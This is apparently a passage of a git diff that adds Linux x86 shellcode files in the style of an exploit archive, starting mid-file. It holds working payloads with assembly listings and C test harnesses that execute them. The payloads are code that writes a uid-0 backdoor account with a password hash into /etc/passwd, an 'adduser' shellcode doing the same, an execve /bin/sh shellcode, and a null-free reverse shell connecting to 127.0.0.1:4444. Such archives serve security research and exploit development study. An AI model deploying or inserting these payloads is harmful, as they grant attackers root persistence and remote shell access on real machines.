ebx, ebx - pop ebx - int 0x80 - -call_write: - - call write - shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash" - - -----------------------(COMPILE)------------------------- - -gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c - -----------------------(C-Code)-------------------------- - -#include -#include - -unsigned char code[] = \ -"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; - -main() -{ - - printf("Shellcode Length: %d\n", strlen(code)); - - int (*ret)() = (int(*)())code; - - ret(); - -} \ No newline at end of file diff --git a/shellcodes/linux/47511.c b/shellcodes/linux/47511.c new file mode 100644 index 000000000..21b9bdbf7 --- /dev/null +++ b/shellcodes/linux/47511.c @@ -0,0 +1,61 @@ +# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes) +# Date: 2019-10-12 +# Author: bolonobolo +# Vendor Homepage: None +# Software Link: None +# Tested on: Linux x86 +# Comments: add user "User" to /etc/passwd +# CVE: N/A + +/* +00000000 31DB xor ebx,ebx +00000002 31C9 xor ecx,ecx +00000004 66B90104 mov cx,0x401 +00000008 F7E3 mul ebx +0000000A 53 push ebx +0000000B 6873737764 push dword 0x64777373 +00000010 68632F7061 push dword 0x61702f63 +00000015 682F2F6574 push dword 0x74652f2f +0000001A 8D1C24 lea ebx,[esp] +0000001D B005 mov al,0x5 +0000001F CD80 int 0x80 +00000021 93 xchg eax,ebx +00000022 F7E2 mul edx +00000024 686E2F7368 push dword 0x68732f6e +00000029 683A2F6269 push dword 0x69622f3a +0000002E 68303A3A2F push dword 0x2f3a3a30 +00000033 683A3A303A push dword 0x3a303a3a +00000038 6855736572 push dword 0x72657355 +0000003D 8D0C24 lea ecx,[esp] +00000040 B214 mov dl,0x14 +00000042 B004 mov al,0x4 +00000044 CD80 int 0x80 +00000046 2C13 sub al,0x13 +00000048 CD80 int 0x80 + + + +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53" +"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68" +"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80" +"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f" +"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30" +"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14" +"\xb0\x04\xcd\x80\x2c\x13\xcd\x80"; + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux/47513.c b/shellcodes/linux/47513.c new file mode 100644 index 000000000..9e4c6e315 --- /dev/null +++ b/shellcodes/linux/47513.c @@ -0,0 +1,45 @@ +# Exploit Title: Linux/x86 - execve /bin/sh ShellCode (25 bytes) +# Date: 2019-10-14 +# Author: bolonobolo +# Vendor Homepage: None +# Software Link: None +# Tested on: Linux x86 +# CVE: N/A + +/* +global _start + +section .text +_start: + + + cdq ; xor edx + mul edx + lea ecx, [eax] + mov esi, 0x68732f2f + mov edi, 0x6e69622f + push ecx ; push NULL in stack + push esi + push edi ; push hs/nib// in stack + lea ebx, [esp] ; load stack pointer to ebx + mov al, 0xb ; load execve in eax + int 0x80 ; execute + +*/ + +#include +#include + +unsigned char code[] = \ +"\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80"; + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux/47514.c b/shellcodes/linux/47514.c new file mode 100644 index 000000000..856fe9459 --- /dev/null +++ b/shellcodes/linux/47514.c @@ -0,0 +1,89 @@ +# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) +# Date: 2019-10-16 +# Author: bolonobolo +# Tested on: Linux x86 +# Software: N/A +# CVE: N/A + +/* +global _start + +section .text +_start: + + + ;socket() + xor ecx, ecx ; xoring ECX + xor ebx, ebx ; xoring EBX + mul ebx ; xoring EAX and EDX + inc cl ; ECX should be 1 + inc bl + inc bl ; EBX should be 2 + mov ax, 0x167 ; + int 0x80 ; call socket() + + ;connect() ; move the return value of socket + xchg ebx, eax ; from EAX to EBX ready for the next syscalls + + ; push sockaddr structure in the stack + dec cl + push ecx ; unused char (0) + + ; move the lenght (16 bytes) of IP in EDX + mov dl, 0x16 + + ; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes + mov ecx, 0x04030382 ; mov ip in ecx + sub ecx, 0x03030303 ; subtract 3.3.3.3 from ip + push ecx ; load the real ip in the stack + push word 0x5c11 ; port 4444 + push word 0x02 ; AF_INET family + lea ecx, [esp] + ; EBX still contain the value of the +opened socket + mov ax, 0x16a + int 0x80 + + ; dup2() + xor ecx, ecx + mov cl, 0x3 + + dup2: + xor eax, eax + ; EBX still contain the value of the +opened socket + mov al, 0x3f + dec cl + int 0x80 + jnz dup2 + + ; execve() from the previous polymorphic analysis 25 bytes + cdq ; xor edx + mul edx ; xor eax + lea ecx, [eax] ; xor ecx + mov esi, 0x68732f2f + mov edi, 0x6e69622f + push ecx ; push NULL in stack + push esi ; push hs/ in stack + push edi ; push nib// in stack + lea ebx, [esp] ; load stack pointer to ebx + mov al, 0xb ; load execve in eax + int 0x80 +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80"; + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file